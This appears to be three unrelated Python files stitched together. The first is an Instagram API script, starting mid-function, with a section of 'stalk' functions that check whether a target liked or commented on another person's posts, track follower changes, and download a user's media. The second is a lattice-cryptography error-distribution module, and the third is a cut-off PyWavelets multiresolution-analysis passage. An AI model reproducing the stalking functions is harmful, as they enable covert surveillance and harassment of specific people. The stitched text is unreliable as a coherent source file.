message = 'Retrieved {{len_content}} media of {0} out of a total of {1}'.format(
total_media_to_be_retrieved,
total_media_count)
else:
message = None
return _api.all_user_recent_media(
user_id,
max_pages=max_pages,
message_template=message,
**kwargs)
######################################################################
################## Secondary Instagram functions #####################
######################################################################
def liked_media(user_id, media):
"""Return the media that have been liked by *user_id*"""
# Initialize update message generator
update_message = print_update_message(len(media))
update_message.send(None)
myprint('Commencing search...')
user_likes = []
for idx, target_media in enumerate(media):
try:
likes = _api.media_likes(target_media.id)
except InstagramClientError as err:
repr(err)
return likes
except InstagramAPIError as err:
if err.error_type == INVALID_RESOURCE:
myprint('Invalid media: {}'.format(target_media.id))
else:
raise err
else:
like_set = UserSet(likes)
if user_id in like_set:
user_likes.append(target_media)
message = Template('$running_time seconds. Found {0} likes. {1} media searched out of {2}, {3} api calls remaining'\
.format(len(user_likes),
idx+1,
len(media),
_api.last_used_api.x_ratelimit_remaining)
)
update_message.send((idx, message))
return user_likes
def media_comments(media, verbose=False):
"""Get comments of media"""
# Initialize message generator
if verbose:
update_message = print_update_message(list_length=len(media), update_interval=5)
update_message.send(None)
myprint('Retrieving comments...')
# Retrieve all comments
all_comments = {}
comments_total = 0
for idx, medium in enumerate(media):
comments = _api.media_comments(media_id = medium.id)
comments_total += len(comments)
all_comments.update({medium:comments})
message = Template('$running_time seconds. Retrieved {0} comments from {1} media out of {2}. {3} api calls remaining'.format(
comments_total,
idx+1, len(media),
_api.last_used_api.x_ratelimit_remaining)
)
if verbose:
update_message.send( (idx, message) )
return all_comments
def search_medium(search_queries, medium, ignore_likes=False):
"""Get all info about a media (comments, likes, tags, text) and search for a specific string"""
results = [False for _ in range(len(search_queries))]
comments = media_comments([medium])
try: # Catch resource not found exception
if not ignore_likes: likes = _api.media_likes(medium.id)
for idx, query in enumerate(search_queries):
# Search users in photo
for user_in_photo in medium.users_in_photo:
if query in user_in_photo.user.username: results[idx] = True
# Search comments
for comment in comments[medium]:
if query in comment.user.username or query in comment.text:
results[idx] = True
# Search likes
if not ignore_likes:
for like in likes:
if query in like.username:
results[idx] = True
# Search the caption
if medium.caption:
if query in medium.caption.text:
results[idx] = True
# Search tags
for tag in medium.tags:
if query in tag.name:
results[idx] = True
except InstagramAPIError as err:
if err.error_type == INVALID_RESOURCE:
return False
else:
raise err
return results
def search_media(search_queries, media, ignore_likes=True):
"""Return a list of media matching a queary that searches for a match in the comments, likes, and tags in a list of media"""
# Initialize update message
update_message = print_update_message(len(media))
update_message.send(None)
# Initialize result data
if type(search_queries) is not list: search_queries = [search_queries]
matches = [ [] for _ in range(len(search_queries))]
# Iterate through media looking for matches to search_queries
for idx0, medium in enumerate(media):
results = search_medium(search_queries, medium, ignore_likes=ignore_likes)
for idx1, result in enumerate(results):
if result:
matches[idx1].append(medium)
# Send update message
message = Template(
'Found {} matches in {} media out of {}. {} api calls remaining'.format(
repr([len(x) for x in matches]), idx0+1, len(media),
_api.last_used_api.x_ratelimit_remaining) )
update_message.send( (idx0, message) )
return matches
def user_commented(user_id, comments):
"""Check for a comment from a user given a list of comments"""
user_comments = []
media = []
for medium in comments:
media_comments = comments[medium]
for comment in media_comments:
if comment.user.id == user_id:
user_comments.append(comment)
media.append(medium)
return (media, user_comments)
def users_in_media(user_ids, media):
"""Return a list of those media where a user is in the photo"""
if type(user_ids) is not list: user_ids = [user_ids]
return [m for m in media if any(
user_id in [u.user.id for u in m.users_in_photo]
for user_id in user_ids)]
######################################################################
########################## Stalk functions ###########################
######################################################################
def stalk_likes_in_follows(user_id, beginning_days_ago=3,
until_days_ago=0, filename=None):
"""Find likes of a user from the media of those they follow"""
# Get all the media of follows within time range
now = int(time.time())
DAY = 24*60*60
follows = _api.all_user_follows(user_id)
params = {'users': follows,
'min_timestamp': now - beginning_days_ago*DAY,
'max_timestamp': now-until_days_ago*DAY}
total_media = media_of_users(**params)
# Check if the user in question has liked any of the media
likes = liked_media(user_id, total_media)
# write urls of liked media to file
if filename:
write_media_urls(likes, filename)
return likes
def stalk_likes_of_user(liker_id, liked_id, **kwargs):
"""Has user liked any media of another particular user"""
kwargs.setdefault('max_pages', 100)
media = user_media(liked_id, verbose=True, **kwargs)
if media != -1:
likes = liked_media(liker_id, media)
return likes
else:
return -1
def stalk_comments_of_user(commenter_id, commentee_id, max_pages=100):
"""Check if user commented on another users instagram"""
media = user_media(user_id=commentee_id, verbose=True, max_pages=max_pages)
comments = media_comments(media)
media_ids, user_comments = user_commented(commenter_id, comments)
return media_ids, user_comments
######################################################################
############### Compare current data to stored data ##################
######################################################################
class compare_follow_data(object):
def __init__(self, follow_data_type):
if follow_data_type == 'follows':
self.follow_type = 'follows'
self.instagram_api_function = _api.all_user_follows
elif follow_data_type == 'followed_by':
self.follow_type = 'followed_by'
self.instagram_api_function = _api.all_user_followed_by
def __call__(self, follow_function):
@wraps(follow_function)
def wrapped_follow_function(user_id, update_data=True, data_dir=None):
if not data_dir:
data_dir = os.path.join(HOME,'Documents', 'Instagram', 'user_data')
# Call instagram api for follows of followed_by
current_data = self.instagram_api_function(user_id, max_pages=500)
# Retrieve stored version of data if exists
stored_data_exists = False
data_path = os.path.join(data_dir, user_id + '_{0}.json'.format(self.follow_type))
if os.path.exists(data_path):
with open(data_path, 'r') as data_file:
temp_user_data = json.load(data_file)
# Convert data to user objects
stored_data = [models.User.object_from_dictionary(u)
for u in temp_user_data]
stored_data_exists = True
# Update stored data to current version
if update_data:
# Make directory structure
if not os.path.exists(data_dir):
os.makedirs(data_dir)
with open(data_path, 'w') as data_file:
data_dict = [u.dictionary_from_object() for u in current_data]
data_file.write(json.dumps(data_dict))
# Compare current and stored data (if stored version exists)
if stored_data_exists:
# Convert data objects to UserSets
set_stored_data = UserSet(stored_data)
set_current_data = UserSet(current_data)
# Compare sets to find new and removed users
new_users = set_current_data - set_stored_data
removed_users = set_stored_data - set_current_data
myprint( 'New {0}:'.format(self.follow_type).replace('_', ' ') )
for u in new_users:
myprint('\t{0}'.format(u.username))
myprint('Removed {0}:'.format(self.follow_type).replace('_', ' '))
for u in removed_users:
myprint('\t{0}'.format(u.username))
return (list(new_users), list(removed_users))
else:
myprint('No stored version of '.format(self.follow_type).replace('_',' '))
return None
if update_data:
myprint( 'Updated {0} data to current information'.\
format(self.follow_type).replace('_',' ') )
return wrapped_follow_function
@compare_follow_data('follows')
def compare_new_follows(user_id, update_data=True):
pass
@compare_follow_data('followed_by')
def compare_new_followed_by(user_id, update_data=True):
pass
######################################################################
######################### Helper functions ###########################
######################################################################
def write_media_urls(media, path='/Desktop/urls.txt'):
"""Write urls of media to file"""
urls = []
media_url = 'http://iconosquare.com/viewer.php#/detail/'
for medium in media:
urls.append(media_url + medium.id)
home = os.environ['HOME']
with open(home + path, 'wb') as url_file:
for url in urls:
url_file.write(url + '\n')
def download_images(media, media_dir, resolution='standard_resolution'):
"""Download images of instagram media"""
# Make the directory
if not os.path.exists(media_dir):
os.makedirs(media_dir)
pass # Directory already exists
for m in media:
media_url = m.images[resolution].url
filetype = media_url.split('.')[-1]
media_path = media_dir + '/' + m.id + '.' + filetype
image = urllib.urlopen(media_url).read()
with open(media_path, 'wb') as media_file:
media_file.write(image)
def download_media_of_user(media, media_dir=None, resolution='standard_resolution'):
"""Download media of a user to drive"""
media_urls = []
for medium in media:
media_id = medium.id
media_url = ''
try:
media_url = medium.videos[resolution].url
except:
media_url = medium.images[resolution].url
media_urls.append((media_id, media_url))
if not media_dir:
media_dir = os.path.join(HOME, 'Desktop', 'Downloaded Media')
now = time.time()
date = datetime.datetime.fromtimestamp(now).strftime('(%b%d_%Y)')
username = media[0].user.username
media_dir = media_dir + username + date
# Check directory structure
if not os.path.exists(media_dir):
os.makedirs(media_dir)
for media_id, media_url in media_urls:
filetype = media_url.split('.')[-1]
filename = media_id + '.' + filetype
data = urllib.urlopen(media_url).read()
with open( os.path.join(media_dir, filename), 'wb' ) as media_file:
media_file.write(data)
def print_update_message(list_length, update_interval=5):
# Display updates of the information every 5 seconds
start = time.time()
interval_start = start
while True:
(idx, message_template) = yield
now = time.time()
interval = now - interval_start
if interval > update_interval or \
interval_start is start or \
(idx + 1) == list_length:
myprint(message_template.substitute(running_time='{0:0.2f}'.\
format(now-start)))
interval_start = now
def open_media(media):
"""Create urls of media and open in webbrowser"""
media_url = 'http://iconosquare.com/viewer.php#/detail/'
if type(media) is list:
for medium in media:
url = media_url + medium.id
subprocess.Popen(['open', url])
time.sleep(2)
else:
url = media_url + media.id
subprocess.Popen(['open', url])
######################################################################
######################## Utility functions ###########################
######################################################################
def myprint(the_string):
if DEBUG: print the_string
if __name__ == '__main__':
DEBUG = True
|
r"""
Module for distributions to specify secret and error distributions.
Contains Uniform and Gaussian distributions with various constructors and utility methods. Instances can be transformed to bounds in various norms.
We write ``sigma`` to denote the standard deviation :math:`\sigma` and :math:`s` to denote the Gaussian width parameter :math:`s = \sigma \cdot \sqrt{2\pi}` and :math:`\alpha = s / q = \sqrt{2\pi} \sigma / q`.
"""
from abc import ABC, abstractmethod
from . import norm
import sage.all
from sage.functions.log import log
from sage.functions.other import sqrt
from sage.rings.all import QQ, RR
from sage.symbolic.all import pi
from sage.symbolic.all import pi, e
import estimator as est
from sage.misc.functional import round
oo = est.PlusInfinity()
# Error Parameter Conversion (extension to functions in estimator.py)
def alpha_to_stddevf(alpha, q):
r"""
noise rate :math:`\alpha`, modulus q → standard deviation :math:`\sigma`
:param alpha: noise rate
:param q: modulus `0 < q`
:returns: :math:`\sigma = \alpha \cdot q / \sqrt{2\pi}`
"""
return est.stddevf(alpha * q)
class Distribution:
def get_alpha(self, q=None, n=None):
pass
class Uniform(norm.BaseNorm, Distribution):
"""
Uniform distribution.
Can be specified via bound :math:`(a, b)` and optional number of non-zero components :math:`h` or uniformly :math:`\mod q`
"""
def __init__(
self, a=None, b=None, h=None, uniform_mod_q=False, q=None, dimension=None
):
r"""
:param a: lower bound if b is specified, else take range [-a, a]
:param b: upper bound, optional
:param h: exactly :math:`h` components are :math:`\in [a,…,b]\setminus\{0\}`, all other components are zero
:param uniform_mod_q: uniform mod q, if True no other value must be specified, if True, q must be set
:param q: only needed for uniform_mod_q
"""
if (not a and not uniform_mod_q) or (a and uniform_mod_q):
raise ValueError("Either a must have a value or uniform must be True.")
self.uniform_mod_q = uniform_mod_q
if not uniform_mod_q:
if b is None:
b = a
a = -a
self.range = (a, b)
self.h = h
else:
if q is None:
raise ValueError(
"q must be set for uniform_mod_q uniform distribution."
)
else:
self.range = (0, q)
self.dimension = dimension
def get_alpha(self, q, n=None):
r"""
Calculates noise rate :math:`\alpha` of approximately equivalent discrete Gaussian distribution.
:param q: modulus
:param n: secret dimension, only needed for uniform mod q and sparse secrets
:returns: noise rate :math:`\alpha`
"""
if n is None:
n = self.dimension
if self.dimension is None:
raise ValueError(
"Dimension must be specified as the object has not be initialized with dimension."
)
variance = est.SDis.variance(self._convert_for_lwe_estimator(), q=q, n=n)
return est.alphaf(sqrt(variance), q, sigma_is_stddev=True)
def get_range(self):
""" """
return self.range
def _convert_for_lwe_estimator(self):
"""
Convert uniform distribution into format accepted by the lwe-estimator
"""
if self.uniform_mod_q:
return "uniform"
elif self.h:
return (self.range, self.h)
else:
return self.range
def to_L1(self, dimension=None):
"""
Convert bound (maximum of :math:`(|a|, |b|)`) to :math:`\ell_1`-norm.
:param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
"""
if dimension is None:
dimension = self.dimension
if self.dimension is None:
raise ValueError(
"Dimension must be specified as the object has not be initialized with dimension."
)
bound = max(abs(self.range[0]), abs(self.range[1]))
return norm.Lp(value=bound, p=oo, dimension=dimension).to_L1()
def to_L2(self, dimension=None):
"""
Convert bound (maximum of :math:`(|a|, |b|)`) to :math:`\ell_2`-norm.
:param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
"""
if dimension is None:
dimension = self.dimension
if self.dimension is None:
raise ValueError(
"Dimension must be specified as the object has not be initialized with dimension."
)
bound = max(abs(self.range[0]), abs(self.range[1]))
return norm.Lp(value=bound, p=oo, dimension=dimension).to_L2()
def to_Loo(self, dimension=None):
"""
Convert bound (maximum of :math:`(|a|, |b|)`) to :math:`\ell_\infty`-norm.
:param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
"""
if dimension is None:
dimension = self.dimension
if self.dimension is None:
raise ValueError(
"Dimension must be specified as the object has not be initialized with dimension."
)
bound = max(abs(self.range[0]), abs(self.range[1]))
return norm.Lp(value=bound, p=oo, dimension=dimension)
def to_Coo(self, dimension=None):
"""
Convert bound (maximum of :math:`(|a|, |b|)`) to :math:`\mathcal{C}_\infty`-norm.
:param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
"""
if dimension is None:
dimension = self.dimension
if self.dimension is None:
raise ValueError(
"Dimension must be specified as the object has not be initialized with dimension."
)
bound = max(abs(self.range[0]), abs(self.range[1]))
return norm.Lp(value=bound, p=oo, dimension=dimension).to_Coo()
def __str__(self) -> str:
return "Uniform [" + str(self._convert_for_lwe_estimator()) + "]"
class Gaussian(norm.BaseNorm, ABC, Distribution):
r"""
Gaussian distribution.
Includes various constructors (in subclasses) :class:`GaussianS` for Gaussian width parameter :math:`s = \sigma \cdot \sqrt{2\pi}`, :class:`GaussianSigma` for standard deviation :math:`\sigma` and :class:`GaussianAlpha` for :math:`\alpha = s / q`. Gaussian can be converted to bounds in various norms with statistical security parameter ``sec``.
"""
@abstractmethod
def __init__(self):
pass
def get_alpha(self, q=None, n=None):
r"""
:returns: noise rate :math:`\alpha = s / q`
"""
if self.alpha is not None:
return self.alpha
else:
return est.alphaf(self.s, q, sigma_is_stddev=False)
def get_stddev(self):
"""
:returns: standard deviation :math:`\sigma`
"""
return self.sigma
def get_s(self):
"""
:returns: Gaussian width parameter :math:`s = \sigma \cdot \sqrt{2\pi}`
"""
return self.s
def to_Lp(self, sec=None, dimension=None):
r"""
Transforms a Gaussian width into :math:`\ell_p`-norm of a vector whose coefficients are distributed according to a Gaussian.
.. _to_Lp:
The following is based on :cite:`Lyu12`.
Given a Gaussian distribution :math:`D_{\mathbb{Z}^n, s}` with width parameter :math:`s = \sqrt{2 \pi} \sigma` and a security parameter :math:`\texttt{sec}`, we can compute a bound :math:`\beta` such that a sample :math:`\mathbf{v}` drawn from :math:`D_{\mathbb{Z}^n, s}` satisfies :math:`\text{Pr}\left[ \|\mathbf{v}\|_\infty \geq \beta \right] \leq 2^{-\texttt{sec}}` as follows:
.. math::
\beta = s \sqrt{\frac{(\texttt{sec} + 1) \ln(2)}{\pi}}.
:param sec: required security for statistical Gaussian to :math:`\ell_p`-bound conversion
:param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
:returns: upper bound of :math:`\ell_2`-norm of vector
"""
if sec is None:
if self.sec:
sec = self.sec
else:
raise ValueError("sec parameter must be specified")
if dimension is None:
dimension = self.dimension
if self.dimension is None:
raise ValueError(
"Dimension must be specified as the object has not be initialized with a dimension."
)
bound = self.s * sqrt(log(2.0) * (sec + 1) / pi)
return norm.Lp(value=bound, p=oo, dimension=dimension)
def to_L1(self, sec=None, dimension=None):
r"""
Transforms a Gaussian width into norm :math:`\ell_1`-norm of a vector whose coefficients are distributed according to a Gaussian (see `to_Lp`_).
:param sec: required security for statistical Gaussian to :math:`\ell_p`-bound conversion
:param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
:returns: upper bound of :math:`\ell_1`-norm of vector
"""
return self.to_Lp(sec=sec, dimension=dimension).to_L1(dimension=dimension)
def to_L2(self, sec=None, dimension=None):
r"""
Transforms a Gaussian width into norm :math:`\ell_2`-norm of a vector whose coefficients are distributed according to an :math:`n`-dimensional Gaussian.
We have that :math:`\text{Pr}\left[ \|X\|_2 > k\sigma \sqrt{n} \right] \leq k^n e^{\frac{n}{2}(1-k^2)}`, for an :math:`n`-dimensional Gaussian :math:`D_{\mathbb{Z}^n, s}` and a random variable :math:`X` with :math:`X \sim D_{\mathbb{Z}^n, s}`, for any :math:`k>1` :cite:`Lyu12`. We set :math:`k=\sqrt{2}` and obtain
.. math::
\text{Pr}\left[ \|X\|_2 > \sigma \sqrt{2n} \right] \leq 2^{\frac{n}{2}} e^{\frac{n}{2}(1-2)} & = 2^{\frac{n}{2}} 2^{-\log e \frac{n}{2}} \\
& = 2^{\frac{n}{2}(1 -\log e)}
If :math:`2^{\frac{n}{2}(1 -\log e)} \leq 2^{-\texttt{sec}}`, we take :math:`\sigma \sqrt{2n}` as our bound :math:`\beta`. Otherwise, we bound the :math:`\ell_2`-norm of :math:`\beta` by the :math:`\ell_\infty`-norm bound (see `to_Lp`_).
:param sec: required security for statistical Gaussian to :math:`\ell_p`-bound conversion
:param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
:returns: upper bound of :math:`\ell_2`-norm of vector
"""
if sec is None:
if self.sec:
sec = self.sec
else:
raise ValueError("sec parameter must be specified")
if dimension is None:
dimension = self.dimension
if self.dimension is None:
raise ValueError(
"Dimension must be specified as the object has not be initialized with a dimension."
)
if 2 ** (dimension / 2 * (1 - log(e, 2))) <= 2 ** (-sec):
bound = self.sigma * sqrt(2 * dimension)
return norm.Lp(value=bound, p=2, dimension=dimension)
else:
return self.to_Lp(sec=sec, dimension=dimension).to_L2(dimension=dimension)
def to_Loo(self, sec=None, dimension=None):
r"""
Transforms a Gaussian width into norm :math:`\ell_\infty`-norm of a vector whose coefficients are distributed according to a Gaussian (see `to_Lp`_).
:param sec: required security for statistical Gaussian to :math:`\ell_p`-bound conversion
:param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
:returns: upper bound of :math:`\ell_\infty`-norm of vector
"""
return self.to_Lp(sec=sec, dimension=dimension).to_Loo(dimension=dimension)
def to_Coo(self, sec=None, dimension=None):
r"""
Transforms a Gaussian width into norm :math:`\mathcal{C}_\infty`-norm of a vector whose coefficients are distributed according to a Gaussian (see `to_Lp`_).
:param sec: required security for statistical Gaussian to :math:`\ell_p`-bound conversion
:param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
:returns: upper bound of :math:`\mathcal{C}_\infty`-norm of vector
"""
return self.to_Lp(sec=sec, dimension=dimension).to_Coo(dimension=dimension)
def _convert_for_lwe_estimator(self):
"""
For secret distribution, implies that secret distribution follows error distribution (others not supported)
"""
return "normal"
def __str__(self) -> str:
return f"Gaussian [sigma={self.sigma}, s={self.s}, alpha={self.alpha}, sec={self.sec}"
class GaussianAlpha(Gaussian):
r"""
Helper class for a Gaussian distribution with input parameter :math:`\alpha`.
"""
def __init__(self, alpha, q, sec=None, dimension=None):
r"""
:param sigma: noise rate :math:`\alpha`
:param q: modulus
:param sec: required security for statistical Gaussian to Lp-bound transformation
:param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
"""
self.alpha = alpha
self.sigma = alpha_to_stddevf(self.alpha, q)
self.s = est.sigmaf(self.sigma)
self.sec = sec
self.dimension = dimension
class GaussianSigma(Gaussian):
"""
Helper class for a Gaussian distribution with input parameter :math:`\sigma` (standard deviation).
"""
def __init__(self, sigma, q=None, sec=None, dimension=None):
"""
:param sigma: standard deviation :math:`\sigma`
:param q: modulus
:param sec: required security for statistical Gaussian to Lp-bound transformation
:param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
"""
self.sigma = sigma
self.s = est.sigmaf(self.sigma)
if q is not None:
self.alpha = est.alphaf(self.sigma, q, sigma_is_stddev=True)
else:
self.alpha = None
self.q = q
self.sec = sec
self.dimension = dimension
class GaussianS(Gaussian):
"""
Helper class for a Gaussian distribution with input parameter :math:`s = \sigma \cdot \sqrt{2\pi}` where :math:`\sigma` is the standard deviation.
"""
def __init__(self, s, q=None, sec=None, dimension=None):
"""
:param sigma: Gaussian width :math:`s = \sigma \cdot \sqrt{2\pi}`
:param q: modulus
:param sec: required security for statistical Gaussian to Lp-bound transformation
:param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
"""
self.s = s
self.sigma = est.stddevf(self.s)
if q is not None:
self.alpha = est.alphaf(s, q)
else:
self.alpha = None
self.q = q
self.sec = sec
self.dimension = dimension
|
<filename>pywt/_mra.py
from functools import partial, reduce
import numpy as np
from ._multilevel import (_prep_axes_wavedecn, wavedec, wavedec2, wavedecn,
waverec, waverec2, waverecn)
from ._swt import iswt, iswt2, iswtn, swt, swt2, swt_max_level, swtn
from ._utils import _modes_per_axis, _wavelets_per_axis
__all__ = ["mra", "mra2", "mran", "imra", "imra2", "imran"]
def mra(data, wavelet, level=None, axis=-1, transform='swt',
mode='periodization'):
"""Forward 1D multiresolution analysis.
It is a projection onto the wavelet subspaces.
Parameters
----------
data: array_like
Input data
wavelet : Wavelet object or name string
Wavelet to use
level : int, optional
Decomposition level (must be >= 0). If level is None (default) then it
will be calculated using the `dwt_max_level` function.
axis: int, optional
Axis over which to compute the DWT. If not given, the last axis is
used. Currently only available when ``transform='dwt'``.
transform : {'dwt', 'swt'}
Whether to use the DWT or SWT for the transforms.
mode : str, optional
Signal extension mode, see `Modes` (default: 'symmetric'). This option
is only used when transform='dwt'.
Returns
-------
[cAn, {details_level_n}, ... {details_level_1}] : list
For more information, see the detailed description in `wavedec`
See Also
--------
imra, swt
Notes
-----
This is sometimes referred to as an additive decomposition because the
inverse transform (``imra``) is just the sum of the coefficient arrays
[1]_. The decomposition using ``transform='dwt'`` corresponds to section
2.2 while that using an undecimated transform (``transform='swt'``) is
described in section 3.2 and appendix A.
This transform does not share the variance partition property of ``swt``
with `norm=True`. It does however, result in coefficients that are
temporally aligned regardless of the symmetry of the wavelet used.
The redundancy of this transform is ``(level + 1)``.
References
----------
.. [1] <NAME> and <NAME>. Analysis of Subtidal
Coastal Sea Level Fluctuations Using Wavelets. Journal of the American
Statistical Association Vol. 92, No. 439 (Sep., 1997), pp. 868-880.
https://doi.org/10.2307/2965551
"""
if transform == 'swt':
if mode != 'periodization':
raise ValueError(
"transform swt only supports mode='periodization'")
kwargs = dict(wavelet=wavelet, axis=axis, norm=True)
forward = partial(swt, level=level, trim_approx=True, **kwargs)
inverse = partial(iswt, **kwargs)
is_swt = True
elif transform == 'dwt':
kwargs = dict(wavelet=wavelet, mode=mode, axis=axis)
forward = partial(wavedec, level=level, **kwargs)
inverse = partial(waverec, **kwargs)
is_swt = False
else:
raise ValueError("unrecognized transform: {}".format(transform))
wav_coeffs = forward(data)
mra_coeffs = []
nc = len(wav_coeffs)
if is_swt:
# replicate same zeros array to save memory
z = np.zeros_like(wav_coeffs[0])
tmp = [z, ] * nc
else:
# zero arrays have variable size in DWT case
tmp = [np.zeros_like(c) for c in wav_coeffs]
for j in range(nc):
# tmp has arrays of zeros except for the jth entry
tmp[j] = wav_coeffs[j]
# reconstruct
rec = inverse(tmp)
if rec.shape != data.shape:
# trim any excess coefficients
rec = rec[tuple([slice(sz) for sz in data.shape])]
mra_coeffs.append(rec)
# restore zeros
if is_swt:
tmp[j] = z
else:
tmp[j] = np.zeros_like(tmp[j])
return mra_coeffs
def imra(mra_coeffs):
"""Inverse 1D multiresolution analysis via summation.
Parameters
----------
mra_coeffs : list of ndarray
Multiresolution analysis coefficients as returned by `mra`.
Returns
-------
rec : ndarray
The reconstructed signal.
See Also
--------
mra
References
----------
.. [1] <NAME> and <NAME>. Analysis of Subtidal
Coastal Sea Level Fluctuations Using Wavelets. Journal of the American
Statistical Association Vol. 92, No. 439 (Sep., 1997), pp. 868-880.
https://doi.org/10.2307/2965551
"""
return reduce(lambda x, y: x + y, mra_coeffs)
def mra2(data, wavelet, level=None, axes=(-2, -1), transform='swt2',
mode='periodization'):
"""Forward 2D multiresolution analysis.
It is a projection onto wavelet subspaces.
Parameters
----------
data: array_like
Input data
wavelet : Wavelet object or name string, or 2-tuple of wavelets
Wavelet to use. This can also be a tuple containing a wavelet to
apply along each axis in `axes`.
level : int, optional
Decomposition level (must be >= 0). If level is None (default) then it
will be calculated using the `dwt_max_level` function.
axes : 2-tuple of ints, optional
Axes over which to compute the DWT. Repeated elements are not allowed.
Currently only available when ``transform='dwt2'``.
transform : {'dwt2', 'swt2'}
Whether to use the DWT or SWT for the transforms.
mode : str or 2-tuple of str, optional
Signal extension mode, see `Modes` (default: 'symmetric'). This option
is only used when transform='dwt2'.
Returns
-------
coeffs : list
For more information, see the detailed description in `wavedec2`
Notes
-----
This is sometimes referred to as an additive decomposition because the
inverse transform (``imra2``) is just the sum of the coefficient arrays
[1]_. The decomposition using ``transform='dwt'`` corresponds to section
2.2 while that using an undecimated transform (``transform='swt'``) is
described in section 3.2 and appendix A.
This transform does not share the variance partition property of ``swt2``
with `norm=True`. It does however, result in coefficients that are
temporally aligned regardless of the symmetry of the wavelet used.
The redundancy of this transform is ``3 * level + 1``.
See Also
--------
imra2, swt2
References
----------
.. [1] <NAME> and <NAME>. Analysis of Subtidal
Coastal Sea Level Fluctuations Using Wavelets. Journal of the American
Statistical Association Vol. 92, No. 439 (Sep., 1997), pp. 868-880.
https://doi.org/10.2307/2965551
"""
if transform == 'swt2':
if mode != 'periodization':
raise ValueError(
"transform swt only supports mode='periodization'")
if level is None:
level = min(swt_max_level(s) for s in data.shape)
kwargs = dict(wavelet=wavelet, axes=axes, norm=True)
forward = partial(swt2, level=level, trim_approx=True, **kwargs)
inverse = partial(iswt2, **kwargs)
elif transform == 'dwt2':
kwargs = dict(wavelet=wavelet, mode=mode, axes=axes)
forward = partial(wavedec2, level=level, **kwargs)
inverse = partial(waverec2, **kwargs)
else:
raise ValueError("unrecognized transform: {}".format(transform))
wav_coeffs = forward(data)
mra_coeffs = []
nc = len(wav_coeffs)
z = np.zeros_like(wav_coeffs[0])
tmp = [z]
for j in range(1, nc):
tmp.append([np.zeros_like(c) for c in wav_coeffs[j]])
# tmp has arrays of zeros except for the jth entry
tmp[0] = wav_coeffs[0]
# reconstruct
rec = inverse(tmp)
if rec.shape != data.shape:
# trim any excess coefficients
rec = rec[tuple([slice(sz) for sz in data.shape])]
mra_coeffs.append(rec)
# restore zeros
tmp[0] = z
for j in range(1, nc):
dcoeffs = []
for n in range(3):
# tmp has arrays of zeros except for the jth entry
z = tmp[j][n]
tmp[j][n] = wav_coeffs[j][n]
# reconstruct
rec = inverse(tmp)
if rec.shape != data.shape:
# trim any excess coefficients
rec = rec[tuple([slice(sz) for sz in data.shape])]
dcoeffs.append(rec)
# restore zeros
tmp[j][n] = z
mra_coeffs.append(tuple(dcoeffs))
return mra_coeffs
def imra2(mra_coeffs):
"""Inverse 2D multiresolution analysis via summation.
Parameters
----------
mra_coeffs : list
Multiresolution analysis coefficients as returned by `mra2`.
Returns
-------
rec : ndarray
The reconstructed signal.
See Also
--------
mra2
References
----------
.. [1] <NAME> and <NAME>. Analysis of Subtidal
Coastal Sea Level Fluctuations Using Wavelets. Journal of the American
Statistical Association Vol. 92, No. 439 (Sep., 1997), pp. 868-880.
https://doi.org/10.2307/2965551
"""
rec = mra_coeffs[0]
for j in range(1, len(mra_coeffs)):
for n in range(3):
rec += mra_coeffs[j][n]
return rec
def mran(data, wavelet, level=None, axes=None, transform='swtn',
mode='periodization'):
"""Forward nD multiresolution analysis.
It is a projection onto the wavelet subspaces.
Parameters
----------
data: array_like
Input data
wavelet : Wavelet object or name string, or tuple of wavelets
Wavelet to use. This can also be a tuple containing a wavelet to
apply along each axis in `axes`.
level : int, optional
Decomposition level (must be >= 0). If level is None (default) then it
will be calculated using the `dwt_max_level` function.
axes : tuple of ints, optional
Axes over which to compute the DWT. Repeated elements are not allowed.
transform : {'dwtn', 'swtn'}
Whether to use the DWT or SWT for the transforms.
mode : str or tuple of str, optional
Signal extension mode, see `Modes` (default: 'symmetric'). This option
is only used when transform='dwtn'.
Returns
-------
coeffs : list
For more information, see the detailed description in `wavedecn`.
See Also
--------
imran, swtn
Notes
-----
This is sometimes referred to as an additive decomposition because the
inverse transform (``imran``) is just the sum of the coefficient arrays
[1]_. The decomposition using ``transform='dwt'`` corresponds to section
2.2 while that using an undecimated transform (``transform='swt'``) is
described in section 3.2 and appendix A.
This transform does not share the variance partition property of ``swtn``
with `norm=True`. It does however, result in coefficients that are
temporally aligned regardless of the symmetry of the wavelet used.
The redundancy of this transform is ``(2**n - 1) * level + 1`` where ``n``
corresponds to the number of axes transformed.
References
----------
.. [1] <NAME> and <NAME>. Analysis of Subtidal
Coastal Sea Level Fluctuations Using Wavelets. Journal of the American
Statistical Association Vol. 92, No. 439 (Sep., 1997), pp. 868-880.
https://doi.org/10.2307/2965551
"""
axes, axes_shapes, ndim_transform = _prep_axes_wavedecn(data.shape, axes)
wavelets = _wavelets_per_axis(wavelet, axes)
if transform == 'swtn':
if mode != 'periodization':
raise ValueError(
"transform swt only supports mode='periodization'")
if level is None:
level = min(swt_max_level(s) for s in data.shape)
kwargs = dict(wavelet=wavelets, axes=axes, norm=True)
forward = partial(swtn, level=level, trim_approx=True, **kwargs)
inverse = partial(iswtn, **kwargs)
elif transform == 'dwtn':
modes = _modes_per_axis(mode, axes)
kwargs = dict(wavelet=wavelets, mode=modes, axes=axes)
forward = partial(wavedecn, level=level, **kwargs)
inverse = partial(waverecn, **kwargs)
else:
raise ValueError("unrecognized transform: {}".format(transform))
wav_coeffs = forward(data)
mra_coeffs = []
nc = len(wav_coeffs)
z = np.zeros_like(wav_coeffs[0])
tmp = [z]
for j in range(1, nc):
tmp.append({k: np.zeros_like(v) for k, v in wav_coeffs[j].items()})
# tmp has arrays of zeros except for the jth entry
